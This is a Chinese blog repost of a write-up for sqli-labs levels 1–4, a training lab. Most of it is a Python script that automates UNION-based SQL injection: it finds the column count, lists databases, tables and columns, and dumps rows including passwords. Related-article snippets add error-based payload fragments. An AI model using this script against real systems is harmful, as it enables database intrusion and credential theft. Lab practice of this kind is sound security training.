sqli-labs:1-4,基于报错的注入

最新推荐文章于 2024-10-07 16:07:06 发布
最新推荐文章于 2024-10-07 16:07:06 发布
阅读量113 收藏
点赞数
文章标签: 数据库
原文链接:http://www.cnblogs.com/p0pl4r/p/10584060.html
版权

sqli1:

脚本

  1 # -*- coding: utf-8 -*-
  2 """
  3 Created on Sat Mar 23 09:37:14 2019
  4 
  5 @author: kenshin
  6 """
  7 
  8 import requests,re
  9 url = 'http://localhost/sqli-labs/Less-1/?id=-1'
 10 
 11 def Len_OrderBy(url):
 12     pattern_mark = 'Unknown column'
 13     #假设字段长20
 14     for i in range(1,20):
 15         url_new = url + "\' order by "+ str(i) +"--+"
 16         r = requests.get(url_new)
 17         if(re.findall(pattern_mark,r.text)):
 18             print('the lenght of column(order by) is :' + str(i-1) + "\n")
 19             break
 20     return i-1
 21 
 22 def get_DB(url,lenght):
 23     #注意:由此模式匹配到的是一个数量为1的列表,后续按','将数量拆分成n个,以便输出
 24     pattern_mark = 'Your Login name:(.+?)<br>'
 25     str = ''
 26     for i in range(1,lenght):
 27         str += 'group_concat(schema_name),'
 28     str += 'group_concat(schema_name)'
 29     payload = '\' union select ' + str +' from information_schema.schemata--+'
 30     url += payload
 31     r = requests.get(url)
 32     r = re.findall(pattern_mark,r.text)
 33     #list转str
 34     str_tmp = "".join(r)
 35     #re.split按','拆分
 36     lst = re.split(',',str_tmp)
 37     print('-'*9 + 'databases' + '-'*8)
 38     for s in lst:
 39         print('.' + s )
 40     print('-'*25)
 41 
 42 def get_TB(url,lenght,db):
 43     pattern_mark = 'Your Login name:(.+?)<br>'
 44     str = ''
 45     for i in range(1,lenght):
 46         str += 'group_concat(table_name),'
 47     str += 'group_concat(table_name)'
 48     payload = "\' union select "+ str +" from information_schema.tables where table_schema=\'" + db + "\'--+"
 49     url += payload
 50     r = requests.get(url)
 51     r = re.findall(pattern_mark,r.text)
 52     #list转str
 53     str_tmp = "".join(r)
 54     #re.split按','拆分
 55     lst = re.split(',',str_tmp)
 56     print('-'*9 +'Database '+ db +'\'s Tables' + '-'*8)
 57     for s in lst:
 58         print('.' + s )
 59     print('-'*35)
 60 
 61 def get_Column(url,lenght,tb):
 62     pattern_mark = 'Your Login name:(.+?)<br>'
 63     str = ''
 64     for i in range(1,lenght):
 65         str += 'group_concat(column_name),'
 66     str += 'group_concat(column_name)'
 67     payload = "\' union select " +str+ " from information_schema.columns where table_name=\'" +tb+ "\'--+"
 68     url += payload
 69     r = requests.get(url)
 70     r = re.findall(pattern_mark,r.text)
 71     #list转str
 72     str_tmp = ''.join(r)
 73     #re.split按','拆分
 74     lst = re.split(',',str_tmp)
 75     print('-'*9 +'Table '+ tb +'\'s Columns' + '-'*8)
 76     for s in lst:
 77         print('.' + s )
 78     print('-'*35)
 79   
 80 def get_data(url,lenght,tb,data):
 81     pattern_mark = 'Your Login name:(.+?)<br>'
 82     pattern_mark_pass = 'Your Password:(.+?)</font>'
 83     #if lenght=5 
 84     #data=a,b,c 
 85     #after expend 
 86     #data=a,b,c,4,5
 87     #str to list
 88     lst = data.split(",")
 89     while len(lst) < lenght:
 90         lst.append(str(len(lst)+1))
 91     #list to str
 92     sn = ''
 93     for i in lst:
 94         sn += i+","
 95     #以上循环结果sn='a,b,c,'  c后的‘,’舍去才能构造正确payload
 96     sn=sn.rstrip(",")
 97     #格式化输出结果
 98     print('-'*9 +'Table '+ tb +'\'s All datas' + '-'*8)
 99     #假设最多有100组数据
100     for i in range(1,100):
101         payload = "\' union select "+ sn +" from "+ tb +" where id="+ str(i) +"--+"
102         url_new = url + payload
103         r = r_pass = requests.get(url_new)
104         r = re.findall(pattern_mark,r.text)
105         r_pass = re.findall(pattern_mark_pass,r_pass.text)
106         print(str(r) +" "*(16-len(str(r)))+"=>  "+str(r_pass)+" "*(18-len(str(r_pass)))+"|")
107         if (len(r)==0 and len(r_pass)==0):
108             break
109     print("-"*41)
110 
111 #字段长度        
112 lenght = Len_OrderBy(url)
113 #所有数据库
114 get_DB(url,lenght)
115 #由库爆表
116 db = input("select databases >> ")
117 get_TB(url,lenght,db)
118 #由表爆列
119 tb = input("select table >> ")
120 get_Column(url,3,tb)
121 #由表和列名爆数据
122 data = input("select columns (no more than " +str(lenght)+ ",and separate by ',') >> ")
123 get_data(url,lenght,tb,data)
脚本 1

 

 

sqli2:

与sqli1比较,少了 ',对id没有经过处理。

 

sqli3:

对id经过了')处理

 

 sqli4:

对id经过了")处理

 

转载于:https://www.cnblogs.com/p0pl4r/p/10584060.html

weixin_30594001
关注
SQLi-Labs 基于报错SQL注入
shangMD01的博客
02-17 2522
实验环境 操作系统:Windows10 安装应用软件:Sqlmap、Burpsuite、FireFox浏览器插件Hackbar等 靶机:A-SQLi-Labs 安装的应用软件:Apache、MYSQL、PHP;DVWA、SQLi-Labs 实验步骤: 1.访问目标网站 在Windows10上打开火狐浏览器,并访问靶机上的SQLi-labs网站Less-1 http://靶机ip/sql/Less-1 登录后,先给一个GET参数: http://靶机ip/sql/Less-1/?i
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1533
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
9、sqli-labs(报错注入1-4)
weixin_41489908的博客
11-26 165
less 1 1、http://192.168.1.119/sqli/Less-1/?id=1 2、在id后面输入’,网页报错, 3、报错内容’1’’ LIMIT 0,1 4、猜测该sql语句为select * from ad where id=‘id’ limit 0,1 5、我们试着闭合 http://192.168.1.119/sqli/Less-1/?id=1’ --+ 程序正常 6、通过...
Sqlilabs靶场报错注入:less1~6
ningwangh的博客
08-05 456
首先做SQL注入,需要知道注入参数是什么,不是所有的参数都是id,也能是file等等。判断注入点,注入点很重要,如果找不到注入的地方,测试什么参数都是在浪费时间。发现与上面用id=1的结果相同,应该是没有逃脱出单引号的控制,应该去闭合单引号,而单引号需要成对出现。与less-5相同,也可以先查询username,在查询password。在这里我输入了id=1,显示出这个结果,说明并没有对用户的输入做过滤。id=0',会显示错误,表示存在注入点,且使用'闭合。下一步,获得数据库名,表名,列名,数据。
Sqli-labs(1-4)基于GET报错sql注入
yangbz123的博客
05-27 312
sqli-lab(1-4)基于GET报错注入 sqli-lab(1) 在地址后面输入?id=1,说明存在注入点。 闭合报错
sqli-labs-基于报错注入
zlloveyouforever的博客
04-30 2834
这里使用sqli-labs第六关来学习报错注入,当然第五关也是可以使用的。会简单介绍updatexml(),extractvalue(),floor(),exp(),geometrycollection(),multipoint()六个函数的使用。
sql报错注入
球球的博客
02-18 903
sql报错注入,floor报错注入,extractvalue报错注入,updatexml报错注入
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
下面是基于SQLi-Labs的SQL注入基础知识点: 一、报错注入 报错注入是指攻击者通过构造特定的SQL语句,让攻击者想要查询的信息通过页面的错误提示回显出来。报错注入一般需要具备两个前提条件: 1. Web应用程序未...
sqli-labs Less-5 (报错注入
A9874564的博客
02-25 4284
在实际场景中,如果没有一个合适的数据返回点,而是仅仅带入Sql数据进行查询,就需要报错注入。 1.less 5 正常情况,我们构造闭合,发现没有问题 利用前几关的思路,发现无论怎么操作都是You are in......,这个时候一般的思路就行不通。 发现:仅带入Sql数据进行查询,没有一个合适的数据返回点,这时候可以尝试报错注入。 2.报错注入 2.1 extractvalue报错 示例: and extractvalue(null,concat(0x7e,(sql_inje.
从零开始的sqli-labs:十一关
asdushf的博客
12-12 763
sqli-labs第十一关 文章目录sqli-labs第十一关前言判断注入类型 前言 十一关开始出现登录框了 判断注入类型 这里注入类型的判断和前面差不太多,关键还是要注意引号的闭合。 上下两边都输入1,发现登录失败上边输入 ...
sql注入报错注入
m0_59855041的博客
06-12 1255
(4)group_concat():GROUP_CONCAT(xxx):是将分组中括号里对应的字符串进行连接.如果分组中括号里的参数xxx有多行,那么就会将这多行的字符串连接,每个字符串之间会有特定的符号进行分隔。注:利用extractvalue()对数据进行一个排序,指定第一个参数为null,可以换成1、#或者其他符号,使其报错,并执行第二个参数语句。(与extractvalue()基本一样,这是updatexml(1,concat(),3)多了一个3的参数。substring(abc,2,2)为bc。
Sqli-labs——lesson17报错注入
weixin_62281892的博客
07-06 232
lesson17
sql注入报错注入
2401_82760239的博客
04-02 1662
报错注入就是利用率数据库的某些机制,人为的制造错误条件,使得查询结果能够出现在错误的信息中。
SQLI-Labs:Less - 5(盲注 报错注入
weixin_43320796的博客
06-14 366
报错注入是一种SQL注入技术,它利用应用程序未正确处理数据库错误的情况,通过构造特定的SQL语句使得数据库产生错误,从而将错误信息暴露在网页上。攻击者可以通过分析这些错误信息,获取数据库中的敏感信息,如用户数据、数据库版本等。报错注入的核心在于利用数据库管理系统(DBMS)的特定函数,如MySQL的updatexml()和extractvalue()函数,当这些函数的参数包含特殊字符时,会触发数据库错误,并将参数内容显示在错误信息中。
SQL注入报错注入
欢迎光临
06-08 1686
一般是在页面没有显示位、但用echo mysql_error();输出了错误信息的时候使用,它的特点是注入速度快,但是语句较复杂,不能用group_concat(),只能用limit依次猜解0x01 利用方式报错注入只要套用公式即可,公式如下(第一个公式count(*)、floor()、rand()、group by不可或缺,后两个公式有32位的限制):?id=2’ and (select 1 f...
sqli-labs less-14post报错注入updatexml
最新发布
wanggonghanfei的博客
10-07 1343
利用hackbar进行注入,构造post语句页面报错,根据分析,闭合方式。
sql注入报错注入;这里用到的是sqli-labs/Less-1;也就是第一关,利用报错信息注入
xiaochenhang的博客
08-17 316
9、利用报错查询查至数据;这里php连接数据库(mysql)时,由于使用了mysql_error 函数进行报错,所以可以利用;updatexml('anything',concat('~',(sql语句)),'anything')7、使用联合查询,查数据库,让前面的id值为假,直接执行后面语句;extractvalue():利用报错进行注入,'~'不是xml实体,所以会报错。4、双引号正常,单引号报错,说明单引号闭合成功,存在字符型注入漏洞。这里使用updatexml(,,)进行报错查询。...
Sqli-labs Less11-12 基于错误的sql注入 - POST
kevinhanser
08-09 651
本文记录 SQL 注入的学习过程,资料为 SQLi SQLi 博客目录 Less - 11: POST - Error Based - Single Quotes - String 测试漏洞 在 username 中输入 admin'--+ 在 password 中输入任意内容 显示错误信息 You have an error in your SQL syntax; c...
SQL注入实战:sqli-labs实验详解
"sqli-labs实验指导手册详细介绍了如何通过搭建sqli-labs实验平台来学习和实践SQL注入攻击及防御。本实验手册主要针对基于单引号的字符型联合注入进行深入解析,帮助读者理解SQL注入的原理,并提供逐步解密数据库...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值